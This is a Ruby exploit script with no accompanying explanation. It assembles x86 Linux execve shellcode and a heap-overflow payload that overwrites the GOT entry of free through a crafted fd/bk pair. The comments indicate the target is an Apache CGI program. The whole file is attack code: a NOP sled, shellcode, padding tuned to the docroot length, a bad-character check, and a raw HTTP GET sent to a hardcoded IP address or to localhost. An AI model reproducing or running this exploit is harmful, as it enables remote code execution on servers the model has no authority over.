require 'socket'

sc = "\xeb\x34"     << # jump callme
     "\x5e" <<
     "\x89\x76\x70" << # *argv = /bin/sh
     "\x8d\x46\x10" << # +3: lea 1b(%esi), %eax // 1b=offset du nick
     "\x89\x46\x74" << # +3: mov %eax, 74(%esi)
     "\x8d\x46\x14" << # +3: lea 1e(%esi), %eax // 1e=offset du mail
     "\x89\x46\x78" << # +3: mov %eax, 78(%esi)
     "\x31\xc0" <<
     "\x88\x46\x0e" << # z-terminate exe
     "\x88\x46\x12" << # +3: z-terminate nick
     "\x88\x46\x21" << # +3: z-terminate mail
     "\x89\x46\x7c" << # *envp = 0
     "\xb0\x08" <<	# nr_execve = 0xb = 0x9++ ++
     "\x40\x40\x40" <<
     "\x89\xf3" <<
     "\x8d\x4e\x70" << # argv=
     "\x8d\x56\x7c" << # envp=
     "\xcd\x80\x31\xdb\x89\xd8\x40\xcd" <<
     "\x80\xe8\xc7\xff\xff\xff" << # call back
#    "/bin/ls+++++++++-lR+/+"
     "/etc/validnivo++jj++john@ofjj.net+"
    # 0123456789abcdef0123456789abcdef01


#sc="\x68\x31\x32\x33\x34\x89\xe1\x31\xdb\x43\x31\xd2\x42\x42\x42\x42\x89\xd0\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80"
#sc = "\xf3\x90\xeb\xfc"

jmpfwd = "\x90\x90\x90\x90\x90\x90\x90\xb8xxxx"


gotfree = 0x0804af38

bufaddr = 0x0804af70
#bufaddr = 0x0804afb8
bufaddr = $1.hex if ARGV.join =~ /bufaddr(?:0x)([a-fA-F0-9]{0,8})/

fd = gotfree - 12
# here that creates a space, which make apache fuck everything up => +8
bk = bufaddr + 0x18 + 8

#cgi = [fd, bk].pack('LL')
# must be a valid dir/file (otherwise apache blocks us before hitting the cgi)
cgi = ''
req = [fd, bk].pack('LL') + 'suuxoorz'
req += (jmpfwd + sc)
req = req.ljust(252-cgi.length, 'x') + [0x30303030].pack('L') + 'x'

docrootlen = 31
docrootlen = $1.to_i if ARGV.join =~ /docrootlen(\d+)/

req << 'x' while (docrootlen + cgi.length + req.length) % 8 != 4

fullreq = cgi + '?' + req

fullreq = '?'+[0xdeadbabe].pack('L') if ARGV.include? 'deadbabe'

[0x20, 0x9, 0xa, 0xb, 0xc, 0xd, 0x0].each { |c|
	if fullreq.index(c.chr)
		puts "Invalid character #{c.to_s(16)} at #{fullreq.index(c.chr)}"
	end
}

if ARGV.include? 'print'
	puts fullreq
	exit
end

#p fullreq
puts fullreq.unpack('C*').map{ |e| "%x " % e }.join

host = '193.168.50.87'
host = 'localhost' if ARGV.include? 'local'
TCPSocket.open(host, 80) { |s|
	s.write "GET #{fullreq} HTTP/1.0\r\n\r\n"
	10.times {
		sleep 0.1
		print s.read
	}
}
puts